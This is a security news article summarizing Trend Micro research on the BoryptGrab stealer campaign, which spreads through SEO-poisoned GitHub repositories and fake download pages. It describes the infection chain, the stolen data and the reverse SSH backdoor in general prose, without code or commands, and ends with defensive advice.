New BoryptGrab Stealer Targets Windows Users via Deceptive GitHub Pages
Trend Micro researchers detail the BoryptGrab stealer campaign, which uses SEO-poisoned GitHub repositories and fake download pages to deliver a data-stealing malware family with a reverse SSH backdoor to Windows users.
Trend Micro researchers have uncovered a new malware campaign dubbed BoryptGrab that targets Windows users through a sophisticated distribution chain leveraging SEO-optimized GitHub repositories and deceptive download pages. The campaign delivers a data-stealing malware family capable of harvesting browser data, cryptocurrency wallet information, system details, and more, along with a novel reverse SSH backdoor called TunnesshClient.
The infection chain begins when victims search for popular software tools—such as gaming cheats, video editors, or system utilities—and encounter malicious GitHub repositories that rank highly in search results due to embedded SEO keywords. These repositories, numbering over a hundred according to Trend Micro, host README files that appear legitimate but contain links to fake download pages hosted on GitHub Pages. The earliest ZIP file identified dates to late 2025, with the initial commit of the earliest repository made in April 2025.
Once a user downloads a ZIP file from a fake download page, the malware is executed. The BoryptGrab stealer then collects a wide range of sensitive data, including browser credentials, cryptocurrency wallet files, screenshots, Telegram and Discord tokens, and passwords. Some variants also download the TunnesshClient backdoor, a PyInstaller executable that establishes a reverse SSH tunnel to the attacker's server, enabling persistent remote access and acting as a SOCKS5 proxy for further malicious activity.
Analysis of the malware code reveals Russian-language comments and log messages throughout different stages of the attack chain, and IP addresses associated with the campaign are located in Russia, suggesting a possible Russian origin for the threat actor. Trend Micro also observed variants of the existing Vidar stealer with code obfuscation being delivered in the same campaign, indicating the attackers are evolving their toolkit.
The campaign demonstrates an evolving social engineering and supply-chain attack vector, exploiting trust in open-source platforms like GitHub to distribute malware. Trend Micro recommends that users verify the authenticity of software downloads, especially from third-party repositories, and employ security solutions that can detect such multi-stage attacks. The full technical analysis, including indicators of compromise, is available in Trend Micro's research report.